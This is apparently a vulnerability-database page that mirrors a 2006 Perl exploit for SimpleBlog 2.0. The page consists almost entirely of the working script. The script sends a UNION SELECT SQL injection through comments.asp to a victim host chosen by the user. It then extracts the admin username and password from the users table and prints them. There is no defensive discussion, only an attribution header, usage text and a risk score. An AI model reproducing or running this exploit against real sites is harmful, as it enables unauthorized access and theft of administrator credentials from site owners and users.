SimpleBlog <= 2.0 (comments.asp) Remote SQL Injection Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType
SimpleBlog <= 2.0 Remote SQL Injection Exploi

                                                #!/usr/bin/perl
#Method found by Chironex Fleckeri 
#Exploit By ASIANEAGLE
#Contact:[email protected]
#Original advisory: http://www.milw0rm.com/exploits/2228
#Usage: exploitname.pl &#60;host&#62; &#60;path&#62; &#60;id&#62;
use IO::Socket;
if(@ARGV != 3) { usage(); }
else { exploit(); }
sub header()
{
  print &#34; *****SimpleBlog 2.0 SQL Injection Exploit***** \r\n&#34;;
  print &#34;      *****www.asianeagle.org***** \r\n&#34;;
  }
sub usage() 
{
  header();
  print &#34; *Usage: $0 &#60;host&#62; &#60;path&#62; &#60;id&#62;\r\n&#34;;
  print &#34; *&#60;host&#62; = Victim&#39;s host ex: www.site.com\r\n&#34;;
  print &#34; *&#60;path&#62; = SimpleBlog Path ex: /SimpleBlog/\r\n&#34;;
  print &#34; *&#60;id&#62;   = Admin ID ex: 1\r\n&#34;;
  exit();
}
sub exploit () 
{
  $simserver = $ARGV[0];
  $simserver =~ s/(http:\/\/)//eg;
  $simhost   = &#34;http://&#34;.$simserver;
  $simdir    = $ARGV[1];
  $simport   = &#34;80&#34;;
  $simtar    = &#34;comments.asp?id=&#34;;
  $simsql    = &#34;-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null%20FROM%20T_USERS%20WHERE%20id%20like%20&#34;.$ARGV[2];
  $simreq    = $simhost.$simdir.$simtar.$simsql;
 
  header();
  print &#34;- Trying to connect: $simserver\r\n&#34;;
  $sim = IO::Socket::INET-&#62;new(Proto =&#62; &#34;tcp&#34;, PeerAddr =&#62; &#34;$simserver&#34;, PeerPort =&#62; &#34;$simport&#34;) || die &#34;- Connection failed...\n&#34;;
  print $sim &#34;GET $simreq HTTP/1.1\n&#34;;
  print $sim &#34;Accept: */*\n&#34;;
  print $sim &#34;Referer: $simhost\n&#34;;
  print $sim &#34;Accept-Language: tr\n&#34;;
  print $sim &#34;User-Agent: Mozzilla\n&#34;;
  print $sim &#34;Cache-Control: no-cache\n&#34;;
  print $sim &#34;Host: $simserver\n&#34;;
  print $sim &#34;Connection: close\n\n&#34;;
  print &#34;Connected...\r\n&#34;;
  while ($answer = &#60;$sim&#62;) {
    if ($answer =~ /class=\&#34;c_content\&#34;&#62;(.*?)&#60;\/td&#62;&#60;\/tr&#62;/) { 
      if ($1 == $ARGV[2]) {
        print &#34;Seems Vulnerable :)\r\n&#34;;
      }
      else { die &#34;- Exploit failed\n&#34;; }     
    }
    if ($answer =~ /class=\&#34;c_content\&#34;&#62;&#60;b&#62;(.*)&#60;\/b&#62;/) {
      print &#34;- Username: $1\r\n&#34;;
    }
    if ($answer =~ /href=\&#34;mailto:(.*?)\&#34;&#62;(.*?)&#60;\/a&#62;/) {
	  print &#34;- Password: $1\r\n&#34;;
    }  
  }
  
 
 
}

# milw0rm.com [2006-08-20]
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1